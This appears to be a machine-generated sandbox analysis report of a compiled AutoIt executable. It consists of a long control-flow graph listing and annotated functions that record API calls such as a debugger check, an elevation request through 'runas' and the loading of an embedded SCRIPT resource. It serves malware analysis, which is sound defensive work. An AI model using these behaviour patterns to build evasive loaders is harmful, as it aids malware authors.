4c7de1 59 API calls 101468->101479 101477 4c7de1 59 API calls 101477->101494 101478->101269 101479->101447 101479->101453 101479->101456 101479->101458 101479->101463 101479->101464 101479->101465 101479->101466 101479->101468 101479->101478 101479->101494 102679 522408 60 API calls 101479->102679 102680 4c9e5d 60 API calls 101479->102680 102681 4c89b3 69 API calls Mailbox 101479->102681 102682 4cb73c 341 API calls 101479->102682 102683 5164da 60 API calls 101479->102683 102684 525244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101479->102684 102685 523c55 66 API calls Mailbox 
101479->102685 101480 529e4a 89 API calls 101480->101494 101482 4c84c0 69 API calls 101482->101494 101483 4c9c90 59 API calls Mailbox 101483->101494 101484 4c9ea0 314 API calls 101484->101494 101485 4cb73c 314 API calls 101485->101494 101487 51617e 59 API calls Mailbox 101487->101494 101488 4c89b3 69 API calls 101488->101494 101489 5055d5 VariantClear 101489->101494 101490 50566b VariantClear 101490->101494 101491 4c8cd4 59 API calls Mailbox 101491->101494 101492 505419 VariantClear 101492->101494 101493 516e8f 59 API calls 101493->101494 101494->101425 101494->101431 101494->101433 101494->101437 101494->101438 101494->101439 101494->101440 101494->101441 101494->101443 101494->101445 101494->101446 101494->101448 101494->101450 101494->101452 101494->101457 101494->101477 101494->101478 101494->101479 101494->101480 101494->101482 101494->101483 101494->101484 101494->101485 101494->101487 101494->101488 101494->101489 101494->101490 101494->101491 101494->101492 101494->101493 102520 4ce6a0 101494->102520 102551 4cf460 101494->102551 102571 4c31ce 101494->102571 102576 4ce420 341 API calls 101494->102576 102577 4cfce0 101494->102577 102663 546018 59 API calls 101494->102663 102664 529a15 59 API calls Mailbox 101494->102664 102665 51d4f2 59 API calls 101494->102665 102666 5160ef 59 API calls 2 library calls 101494->102666 102667 4c8401 59 API calls 101494->102667 102668 4c82df 101494->102668 101495->101239 101496->101246 101497->101258 101499 4fec6b 101498->101499 101500 4c7b40 101498->101500 102999 517bdb 59 API calls _memmove 101499->102999 102993 4c7a51 101500->102993 101503 4c7b4c 101503->101282 101504 4fec75 101505 4c8047 59 API calls 101504->101505 101506 4fec7d Mailbox 101505->101506 101508 4c3d3e __ftell_nolock 101507->101508 101509 4c7bcc 59 API calls 101508->101509 101514 4c3ea4 Mailbox 101508->101514 101511 4c3d70 101509->101511 101519 4c3da6 Mailbox 101511->101519 101618 4c79f2 101511->101618 101512 4c79f2 59 API calls 101512->101519 101513 4c3e77 
101513->101514 101515 4c7de1 59 API calls 101513->101515 101514->101290 101517 4c3e98 101515->101517 101516 4c7de1 59 API calls 101516->101519 101518 4c3f74 59 API calls 101517->101518 101518->101514 101519->101512 101519->101513 101519->101514 101519->101516 101520 4c3f74 59 API calls 101519->101520 101520->101519 101621 4c4bb5 101521->101621 101526 4c4e08 LoadLibraryExW 101631 4c4b6a 101526->101631 101527 4fd8e6 101528 4c4e4a 84 API calls 101527->101528 101530 4fd8ed 101528->101530 101532 4c4b6a 3 API calls 101530->101532 101535 4fd8f5 101532->101535 101534 4c4e2f 101534->101535 101536 4c4e3b 101534->101536 101657 4c4f0b 101535->101657 101537 4c4e4a 84 API calls 101536->101537 101539 4c37d4 101537->101539 101539->101297 101539->101298 101542 4fd91c 101665 4c4ec7 101542->101665 101544 4fd929 101546 4e0db6 Mailbox 59 API calls 101545->101546 101547 4c37fb 101546->101547 101547->101311 101549 4c84cb 101548->101549 101551 4c84f2 101549->101551 101916 4c89b3 69 API calls Mailbox 101549->101916 101551->101315 101553 4c3eda 101552->101553 101554 4c3ef3 101552->101554 101555 4c8047 59 API calls 101553->101555 101556 4c7bcc 59 API calls 101554->101556 101557 4c3879 101555->101557 101556->101557 101558 4e2efd 101557->101558 101559 4e2f7e 101558->101559 101560 4e2f09 101558->101560 101919 4e2f90 60 API calls 4 library calls 101559->101919 101567 4e2f2e 101560->101567 101917 4e8b28 58 API calls __getptd_noexit 101560->101917 101563 4e2f8b 101563->101336 101564 4e2f15 101918 4e8db6 9 API calls __commit 101564->101918 101566 4e2f20 101566->101336 101567->101336 101569 4ff17c 101568->101569 101574 4c8ef7 101568->101574 101569->101574 101920 4c8bdb 59 API calls Mailbox 101569->101920 101571 4c8ff8 101575 4e0db6 Mailbox 59 API calls 101571->101575 101572 4c9040 101573 4c9d3c 60 API calls 101572->101573 101576 4c8fff 101573->101576 101574->101571 101574->101572 101574->101576 101575->101576 101576->101364 101578 4c4ee5 85 API calls 101577->101578 101579 5295ca 101578->101579 
101921 529734 101579->101921 101582 4c4f0b 74 API calls 101583 5295f7 101582->101583 101584 4c4f0b 74 API calls 101583->101584 101585 529607 101584->101585 101586 4c4f0b 74 API calls 101585->101586 101587 529622 101586->101587 101588 4c4f0b 74 API calls 101587->101588 101589 52963d 101588->101589 101590 4c4ee5 85 API calls 101589->101590 101591 529654 101590->101591 101592 4e571c __crtCompareStringA_stat 58 API calls 101591->101592 101593 52965b 101592->101593 101594 4e571c __crtCompareStringA_stat 58 API calls 101593->101594 101595 529665 101594->101595 101596 4c4f0b 74 API calls 101595->101596 101597 529679 101596->101597 101598 529109 GetSystemTimeAsFileTime 101597->101598 101599 52968c 101598->101599 101600 5296a1 101599->101600 101601 5296b6 101599->101601 101602 4e2d55 _free 58 API calls 101600->101602 101603 52971b 101601->101603 101604 5296bc 101601->101604 101606 5296a7 101602->101606 101605 4e2d55 _free 58 API calls 101603->101605 101927 528b06 116 API calls __fcloseall 101604->101927 101611 4fd186 101605->101611 101609 4e2d55 _free 58 API calls 101606->101609 101608 529713 101610 4e2d55 _free 58 API calls 101608->101610 101609->101611 101610->101611 101611->101301 101612 4c4e4a 101611->101612 101613 4c4e5b 101612->101613 101614 4c4e54 101612->101614 101616 4c4e6a 101613->101616 101617 4c4e7b FreeLibrary 101613->101617 101928 4e53a6 101614->101928 101616->101301 101617->101616 101619 4c7e4f 59 API calls 101618->101619 101620 4c79fd 101619->101620 101620->101511 101670 4c4c03 101621->101670 101624 4c4c03 2 API calls 101627 4c4bdc 101624->101627 101625 4c4bec FreeLibrary 101626 4c4bf5 101625->101626 101628 4e525b 101626->101628 101627->101625 101627->101626 101674 4e5270 101628->101674 101630 4c4dfc 101630->101526 101630->101527 101834 4c4c36 101631->101834 101634 4c4b8f 101636 4c4baa 101634->101636 101637 4c4ba1 FreeLibrary 101634->101637 101635 4c4c36 2 API calls 101635->101634 101638 4c4c70 101636->101638 101637->101636 101639 4e0db6 Mailbox 59 API calls 
101638->101639 101640 4c4c85 101639->101640 101641 4c522e 59 API calls 101640->101641 101642 4c4c91 _memmove 101641->101642 101644 4c4d89 101642->101644 101645 4c4dc1 101642->101645 101648 4c4ccc 101642->101648 101643 4c4ec7 69 API calls 101654 4c4cd5 101643->101654 101838 4c4e89 CreateStreamOnHGlobal 101644->101838 101849 52991b 95 API calls 101645->101849 101648->101643 101649 4c4f0b 74 API calls 101649->101654 101651 4c4d69 101651->101534 101652 4fd8a7 101653 4c4ee5 85 API calls 101652->101653 101655 4fd8bb 101653->101655 101654->101649 101654->101651 101654->101652 101844 4c4ee5 101654->101844 101656 4c4f0b 74 API calls 101655->101656 101656->101651 101658 4c4f1d 101657->101658 101659 4fd9cd 101657->101659 101873 4e55e2 101658->101873 101662 529109 101893 528f5f 101662->101893 101664 52911f 101664->101542 101666 4c4ed6 101665->101666 101669 4fd990 101665->101669 101898 4e5c60 101666->101898 101668 4c4ede 101668->101544 101671 4c4bd0 101670->101671 101672 4c4c0c LoadLibraryA 101670->101672 101671->101624 101671->101627 101672->101671 101673 4c4c1d GetProcAddress 101672->101673 101673->101671 101676 4e527c __ioinit 101674->101676 101675 4e528f 101723 4e8b28 58 API calls __getptd_noexit 101675->101723 101676->101675 101678 4e52c0 101676->101678 101693 4f04e8 101678->101693 101679 4e5294 101724 4e8db6 9 API calls __commit 101679->101724 101682 4e52c5 101683 4e52ce 101682->101683 101684 4e52db 101682->101684 101725 4e8b28 58 API calls __getptd_noexit 101683->101725 101686 4e5305 101684->101686 101687 4e52e5 101684->101687 101708 4f0607 101686->101708 101726 4e8b28 58 API calls __getptd_noexit 101687->101726 101690 4e529f __ioinit @_EH4_CallFilterFunc@8 101690->101630 101694 4f04f4 __ioinit 101693->101694 101695 4e9c0b __lock 58 API calls 101694->101695 101706 4f0502 101695->101706 101696 4f0576 101728 4f05fe 101696->101728 101697 4f057d 101733 4e881d 58 API calls 2 library calls 101697->101733 101700 4f05f3 __ioinit 101700->101682 101701 4f0584 101701->101696 101734 
4e9e2b InitializeCriticalSectionAndSpinCount 101701->101734 101702 4e9c93 __mtinitlocknum 58 API calls 101702->101706 101705 4f05aa EnterCriticalSection 101705->101696 101706->101696 101706->101697 101706->101702 101731 4e6c50 59 API calls __lock 101706->101731 101732 4e6cba LeaveCriticalSection LeaveCriticalSection _doexit 101706->101732 101709 4f0627 __wopenfile 101708->101709 101710 4f0641 101709->101710 101722 4f07fc 101709->101722 101741 4e37cb 60 API calls 3 library calls 101709->101741 101739 4e8b28 58 API calls __getptd_noexit 101710->101739 101712 4f0646 101740 4e8db6 9 API calls __commit 101712->101740 101714 4e5310 101727 4e5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 101714->101727 101715 4f085f 101736 4f85a1 101715->101736 101718 4f07f5 101718->101722 101742 4e37cb 60 API calls 3 library calls 101718->101742 101720 4f0814 101720->101722 101743 4e37cb 60 API calls 3 library calls 101720->101743 101722->101710 101722->101715 101723->101679 101724->101690 101725->101690 101726->101690 101727->101690 101735 4e9d75 LeaveCriticalSection 101728->101735 101730 4f0605 101730->101700 101731->101706 101732->101706 101733->101701 101734->101705 101735->101730 101744 4f7d85 101736->101744 101738 4f85ba 101738->101714 101739->101712 101740->101714 101741->101718 101742->101720 101743->101722 101747 4f7d91 __ioinit 101744->101747 101745 4f7da7 101831 4e8b28 58 API calls __getptd_noexit 101745->101831 101747->101745 101748 4f7ddd 101747->101748 101755 4f7e4e 101748->101755 101749 4f7dac 101832 4e8db6 9 API calls __commit 101749->101832 101752 4f7df9 101833 4f7e22 LeaveCriticalSection __unlock_fhandle 101752->101833 101754 4f7db6 __ioinit 101754->101738 101756 4f7e6e 101755->101756 101757 4e44ea __wsopen_nolock 58 API calls 101756->101757 101761 4f7e8a 101757->101761 101758 4f7fc1 101759 4e8dc6 __invoke_watson 8 API calls 101758->101759 101760 4f85a0 101759->101760 101763 4f7d85 __wsopen_helper 103 API calls 101760->101763 101761->101758 101762 4f7ec4 
101761->101762 101769 4f7ee7 101761->101769 101764 4e8af4 __set_osfhnd 58 API calls 101762->101764 101765 4f85ba 101763->101765 101766 4f7ec9 101764->101766 101765->101752 101767 4e8b28 __set_osfhnd 58 API calls 101766->101767 101768 4f7ed6 101767->101768 101771 4e8db6 __commit 9 API calls 101768->101771 101770 4f7fa5 101769->101770 101778 4f7f83 101769->101778 101772 4e8af4 __set_osfhnd 58 API calls 101770->101772 101773 4f7ee0 101771->101773 101774 4f7faa 101772->101774 101773->101752 101775 4e8b28 __set_osfhnd 58 API calls 101774->101775 101776 4f7fb7 101775->101776 101777 4e8db6 __commit 9 API calls 101776->101777 101777->101758 101779 4ed294 __alloc_osfhnd 61 API calls 101778->101779 101780 4f8051 101779->101780 101781 4f807e 101780->101781 101782 4f805b 101780->101782 101784 4f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101781->101784 101783 4e8af4 __set_osfhnd 58 API calls 101782->101783 101785 4f8060 101783->101785 101792 4f80a0 101784->101792 101786 4e8b28 __set_osfhnd 58 API calls 101785->101786 101789 4f806a 101786->101789 101787 4f811e GetFileType 101790 4f816b 101787->101790 101791 4f8129 GetLastError 101787->101791 101788 4f80ec GetLastError 101793 4e8b07 __dosmaperr 58 API calls 101788->101793 101794 4e8b28 __set_osfhnd 58 API calls 101789->101794 101800 4ed52a __set_osfhnd 59 API calls 101790->101800 101795 4e8b07 __dosmaperr 58 API calls 101791->101795 101792->101787 101792->101788 101796 4f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101792->101796 101797 4f8111 101793->101797 101794->101773 101798 4f8150 CloseHandle 101795->101798 101799 4f80e1 101796->101799 101802 4e8b28 __set_osfhnd 58 API calls 101797->101802 101798->101797 101801 4f815e 101798->101801 101799->101787 101799->101788 101806 4f8189 101800->101806 101803 4e8b28 __set_osfhnd 58 API calls 101801->101803 101802->101758 101804 4f8163 101803->101804 101804->101797 101805 4f8344 101805->101758 101808 4f8517 CloseHandle 101805->101808 101806->101805 
101807 4f18c1 __lseeki64_nolock 60 API calls 101806->101807 101823 4f820a 101806->101823 101809 4f81f3 101807->101809 101810 4f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101808->101810 101813 4e8af4 __set_osfhnd 58 API calls 101809->101813 101829 4f8212 101809->101829 101812 4f853e 101810->101812 101811 4f0e5b 70 API calls __read_nolock 101811->101829 101814 4f83ce 101812->101814 101815 4f8546 GetLastError 101812->101815 101813->101823 101814->101758 101816 4e8b07 __dosmaperr 58 API calls 101815->101816 101819 4f8552 101816->101819 101817 4f0add __close_nolock 61 API calls 101817->101829 101818 4f18c1 60 API calls __lseeki64_nolock 101818->101829 101820 4ed43d __free_osfhnd 59 API calls 101819->101820 101820->101814 101821 4f97a2 __chsize_nolock 82 API calls 101821->101829 101822 4ed886 __write 78 API calls 101822->101823 101823->101805 101823->101822 101826 4f18c1 60 API calls __lseeki64_nolock 101823->101826 101823->101829 101824 4f83c1 101827 4f0add __close_nolock 61 API calls 101824->101827 101825 4f83aa 101825->101805 101826->101823 101828 4f83c8 101827->101828 101830 4e8b28 __set_osfhnd 58 API calls 101828->101830 101829->101811 101829->101817 101829->101818 101829->101821 101829->101823 101829->101824 101829->101825 101830->101814 101831->101749 101832->101754 101833->101754 101835 4c4b83 101834->101835 101836 4c4c3f LoadLibraryA 101834->101836 101835->101634 101835->101635 101836->101835 101837 4c4c50 GetProcAddress 101836->101837 101837->101835 101839 4c4ea3 FindResourceExW 101838->101839 101843 4c4ec0 101838->101843 101840 4fd933 LoadResource 101839->101840 101839->101843 101841 4fd948 SizeofResource 101840->101841 101840->101843 101842 4fd95c LockResource 101841->101842 101841->101843 101842->101843 101843->101648 101845 4fd9ab 101844->101845 101846 4c4ef4 101844->101846 101850 4e584d 101846->101850 101848 4c4f02 101848->101654 101849->101648 101851 4e5859 __ioinit 101850->101851 101852 4e586b 101851->101852 101854 4e5891 
101851->101854 101863 4e8b28 58 API calls __getptd_noexit 101852->101863 101865 4e6c11 101854->101865 101856 4e5870 101864 4e8db6 9 API calls __commit 101856->101864 101857 4e5897 101871 4e57be 83 API calls 5 library calls 101857->101871 101860 4e58a6 101872 4e58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 101860->101872 101862 4e587b __ioinit 101862->101848 101863->101856 101864->101862 101866 4e6c43 EnterCriticalSection 101865->101866 101867 4e6c21 101865->101867 101868 4e6c39 101866->101868 101867->101866 101869 4e6c29 101867->101869 101868->101857 101870 4e9c0b __lock 58 API calls 101869->101870 101870->101868 101871->101860 101872->101862 101876 4e55fd 101873->101876 101875 4c4f2e 101875->101662 101877 4e5609 __ioinit 101876->101877 101878 4e561f _memset 101877->101878 101879 4e564c 101877->101879 101880 4e5644 __ioinit 101877->101880 101889 4e8b28 58 API calls __getptd_noexit 101878->101889 101881 4e6c11 __lock_file 59 API calls 101879->101881 101880->101875 101882 4e5652 101881->101882 101891 4e541d 72 API calls 6 library calls 101882->101891 101885 4e5639 101890 4e8db6 9 API calls __commit 101885->101890 101886 4e5668 101892 4e5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 101886->101892 101889->101885 101890->101880 101891->101886 101892->101880 101896 4e520a GetSystemTimeAsFileTime 101893->101896 101895 528f6e 101895->101664 101897 4e5238 __aulldiv 101896->101897 101897->101895 101899 4e5c6c __ioinit 101898->101899 101900 4e5c7e 101899->101900 101901 4e5c93 101899->101901 101912 4e8b28 58 API calls __getptd_noexit 101900->101912 101903 4e6c11 __lock_file 59 API calls 101901->101903 101905 4e5c99 101903->101905 101904 4e5c83 101913 4e8db6 9 API calls __commit 101904->101913 101914 4e58d0 67 API calls 7 library calls 101905->101914 101908 4e5ca4 101915 4e5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 101908->101915 101910 4e5cb6 101911 4e5c8e __ioinit 101910->101911 101911->101668 101912->101904 101913->101911 101914->101908 
101915->101910 101916->101551 101917->101564 101918->101566 101919->101563 101920->101574 101922 529748 __tzset_nolock _wcscmp 101921->101922 101923 5295dc 101922->101923 101924 4c4f0b 74 API calls 101922->101924 101925 529109 GetSystemTimeAsFileTime 101922->101925 101926 4c4ee5 85 API calls 101922->101926 101923->101582 101923->101611 101924->101922 101925->101922 101926->101922 101927->101608 101929 4e53b2 __ioinit 101928->101929 101930 4e53de 101929->101930 101931 4e53c6 101929->101931 101933 4e6c11 __lock_file 59 API calls 101930->101933 101937 4e53d6 __ioinit 101930->101937 101957 4e8b28 58 API calls __getptd_noexit 101931->101957 101935 4e53f0 101933->101935 101934 4e53cb 101958 4e8db6 9 API calls __commit 101934->101958 101941 4e533a 101935->101941 101937->101613 101942 4e535d 101941->101942 101943 4e5349 101941->101943 101944 4e5359 101942->101944 101960 4e4a3d 101942->101960 102003 4e8b28 58 API calls __getptd_noexit 101943->102003 101959 4e5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 101944->101959 101947 4e534e 102004 4e8db6 9 API calls __commit 101947->102004 101953 4e5377 101977 4f0a02 101953->101977 101955 4e537d 101955->101944 101956 4e2d55 _free 58 API calls 101955->101956 101956->101944 101957->101934 101958->101937 101959->101937 101961 4e4a74 101960->101961 101962 4e4a50 101960->101962 101966 4f0b77 101961->101966 101962->101961 101963 4e46e6 __filbuf 58 API calls 101962->101963 101964 4e4a6d 101963->101964 102005 4ed886 101964->102005 101967 4e5371 101966->101967 101968 4f0b84 101966->101968 101970 4e46e6 101967->101970 101968->101967 101969 4e2d55 _free 58 API calls 101968->101969 101969->101967 101971 4e4705 101970->101971 101972 4e46f0 101970->101972 101971->101953 102140 4e8b28 58 API calls __getptd_noexit 101972->102140 101974 4e46f5 102141 4e8db6 9 API calls __commit 101974->102141 101976 4e4700 101976->101953 101978 4f0a0e __ioinit 101977->101978 101979 4f0a1b 101978->101979 101980 4f0a32 101978->101980 102157 4e8af4 58 API 
[Control-flow graph edge listing omitted: a flattened node/edge dump of the disassembly view (node ids and call edges). API calls visible in it include WriteFile, ReadFile, SetFilePointerEx, CreateFileW, CloseHandle, GetLastError, GetConsoleMode, GetConsoleCP, WriteConsoleW, WideCharToMultiByte, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetLongPathNameW, SetCurrentDirectoryW, GetFileAttributesW, FindFirstFileW, FindClose, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetStdHandle, OleInitialize, CreateThread, RegisterWindowMessageW, Shell_NotifyIconW, LoadStringW, DestroyIcon, CharUpperBuffW, IsDialogMessageW, GetClassLongW, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, DeleteObject and DestroyWindow.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C3B68
• IsDebuggerPresent.KERNEL32 ref: 004C3B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,005852F8,005852E0,?,?), ref: 004C3BEB
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
  • Part of subcall function 004D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004C3C14,005852F8,?,?,?), ref: 004D096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 004C3C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00577770,00000010), ref: 004FD281
• SetCurrentDirectoryW.KERNEL32(?,005852F8,?,?,?), ref: 004FD2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00574260,005852F8,?,?,?), ref: 004FD33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 004FD346
  • Part of subcall function 004C3A46: GetSysColorBrush.USER32(0000000F), ref: 004C3A50
  • Part of subcall function 004C3A46: LoadCursorW.USER32(00000000,00007F00), ref: 004C3A5F
  • Part of subcall function 004C3A46: LoadIconW.USER32(00000063), ref: 004C3A76
  • Part of subcall function 004C3A46: LoadIconW.USER32(000000A4), ref: 004C3A88
  • Part of subcall function 004C3A46: LoadIconW.USER32(000000A2), ref: 004C3A9A
  • Part of subcall function 004C3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004C3AC0
  • Part of subcall function 004C3A46: RegisterClassExW.USER32(?), ref: 004C3B16
  • Part of subcall function 004C39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004C3A03
  • Part of subcall function 004C39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004C3A24
  • Part of subcall function 004C39D5: ShowWindow.USER32(00000000,?,?), ref: 004C3A38
  • Part of subcall function 004C39D5: ShowWindow.USER32(00000000,?,?), ref: 004C3A41
  • Part of subcall function 004C434A: _memset.LIBCMT ref: 004C4370
  • Part of subcall function 004C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004C4415
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%U
• API String ID: 529118366-3007341966
• Opcode ID: f5a3c550d88f38fa34f4caa0d28bf4cbc767fef296c8f1679847c458ad36c0ce
• Instruction ID: 0cdf3bb24a46bb51d5a3b330a771522bedb4372e82d94bde0c9830a62f0e2339
• Opcode Fuzzy Hash: f5a3c550d88f38fa34f4caa0d28bf4cbc767fef296c8f1679847c458ad36c0ce
• Instruction Fuzzy Hash: 9F51F63DD04108AACB50EFB5DC05FFE7B75AB55318F0080AFF85272262DA785609DB29

Control-flow Graph

• Executed
• Not Executed
                                                                                                                      control_flow_graph 1037 4c49a0-4c4a00 call 4c7667 GetVersionExW call 4c7bcc 1042 4c4b0b-4c4b0d 1037->1042 1043 4c4a06 1037->1043 1044 4fd767-4fd773 1042->1044 1045 4c4a09-4c4a0e 1043->1045 1046 4fd774-4fd778 1044->1046 1047 4c4a14 1045->1047 1048 4c4b12-4c4b13 1045->1048 1050 4fd77b-4fd787 1046->1050 1051 4fd77a 1046->1051 1049 4c4a15-4c4a4c call 4c7d2c call 4c7726 1047->1049 1048->1049 1059 4fd864-4fd867 1049->1059 1060 4c4a52-4c4a53 1049->1060 1050->1046 1053 4fd789-4fd78e 1050->1053 1051->1050 1053->1045 1055 4fd794-4fd79b 1053->1055 1055->1044 1057 4fd79d 1055->1057 1061 4fd7a2-4fd7a5 1057->1061 1062 4fd869 1059->1062 1063 4fd880-4fd884 1059->1063 1060->1061 1064 4c4a59-4c4a64 1060->1064 1065 4fd7ab-4fd7c9 1061->1065 1066 4c4a93-4c4aaa GetCurrentProcess IsWow64Process 1061->1066 1067 4fd86c 1062->1067 1071 4fd86f-4fd878 1063->1071 1072 4fd886-4fd88f 1063->1072 1068 4fd7ea-4fd7f0 1064->1068 1069 4c4a6a-4c4a6c 1064->1069 1065->1066 1070 4fd7cf-4fd7d5 1065->1070 1073 4c4aac 1066->1073 1074 4c4aaf-4c4ac0 1066->1074 1067->1071 1079 4fd7fa-4fd800 1068->1079 1080 4fd7f2-4fd7f5 1068->1080 1075 4fd805-4fd811 1069->1075 1076 4c4a72-4c4a75 1069->1076 1077 4fd7df-4fd7e5 1070->1077 1078 4fd7d7-4fd7da 1070->1078 1071->1063 1072->1067 1081 4fd891-4fd894 1072->1081 1073->1074 1082 4c4b2b-4c4b35 GetSystemInfo 1074->1082 1083 4c4ac2-4c4ad2 call 4c4b37 1074->1083 1087 4fd81b-4fd821 1075->1087 1088 4fd813-4fd816 1075->1088 1084 4c4a7b-4c4a8a 1076->1084 1085 4fd831-4fd834 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1086 4c4af8-4c4b08 1082->1086 1094 4c4b1f-4c4b29 GetSystemInfo 1083->1094 1095 4c4ad4-4c4ae1 call 4c4b37 1083->1095 1092 4fd826-4fd82c 1084->1092 1093 4c4a90 1084->1093 1085->1066 1091 4fd83a-4fd84f 1085->1091 1087->1066 1088->1066 1096 4fd859-4fd85f 1091->1096 1097 4fd851-4fd854 1091->1097 1092->1066 1093->1066 1099 4c4ae9-4c4aed 
1094->1099 1102 4c4b18-4c4b1d 1095->1102 1103 4c4ae3-4c4ae7 GetNativeSystemInfo 1095->1103 1096->1066 1097->1066 1099->1086 1101 4c4aef-4c4af2 FreeLibrary 1099->1101 1101->1086 1102->1103 1103->1099
APIs
• GetVersionExW.KERNEL32(?), ref: 004C49CD
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
• GetCurrentProcess.KERNEL32(?,0054FAEC,00000000,00000000,?), ref: 004C4A9A
• IsWow64Process.KERNEL32(00000000), ref: 004C4AA1
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 004C4AE7
• FreeLibrary.KERNEL32(00000000), ref: 004C4AF2
• GetSystemInfo.KERNEL32(00000000), ref: 004C4B23
• GetSystemInfo.KERNEL32(00000000), ref: 004C4B2F
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: 2cb3f24f7bcde931fec62efdae1e212df66593b961665999c3ff541d16a60fbf
• Instruction ID: 624e834d1b227bf1fa62a1fe8e8265c46c44c43b061bbab44602ce709fb05a69
• Opcode Fuzzy Hash: 2cb3f24f7bcde931fec62efdae1e212df66593b961665999c3ff541d16a60fbf
• Instruction Fuzzy Hash: 3291E7359897C4DAC771DBA885606ABBFF5AF7A300B08495FD0C743B01D229B908D75E

Control-flow Graph

• Executed
• Not Executed
                                                                                                                      control_flow_graph 1104 4c4e89-4c4ea1 CreateStreamOnHGlobal 1105 4c4ec1-4c4ec6 1104->1105 1106 4c4ea3-4c4eba FindResourceExW 1104->1106 1107 4fd933-4fd942 LoadResource 1106->1107 1108 4c4ec0 1106->1108 1107->1108 1109 4fd948-4fd956 SizeofResource 1107->1109 1108->1105 1109->1108 1110 4fd95c-4fd967 LockResource 1109->1110 1110->1108 1111 4fd96d-4fd98b 1110->1111 1111->1108
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004C4D8E,?,?,00000000,00000000), ref: 004C4E99
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004C4D8E,?,?,00000000,00000000), ref: 004C4EB0
• LoadResource.KERNEL32(?,00000000,?,?,004C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,004C4E2F), ref: 004FD937
• SizeofResource.KERNEL32(?,00000000,?,?,004C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,004C4E2F), ref: 004FD94C
• LockResource.KERNEL32(004C4D8E,?,?,004C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,004C4E2F,00000000), ref: 004FD95F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
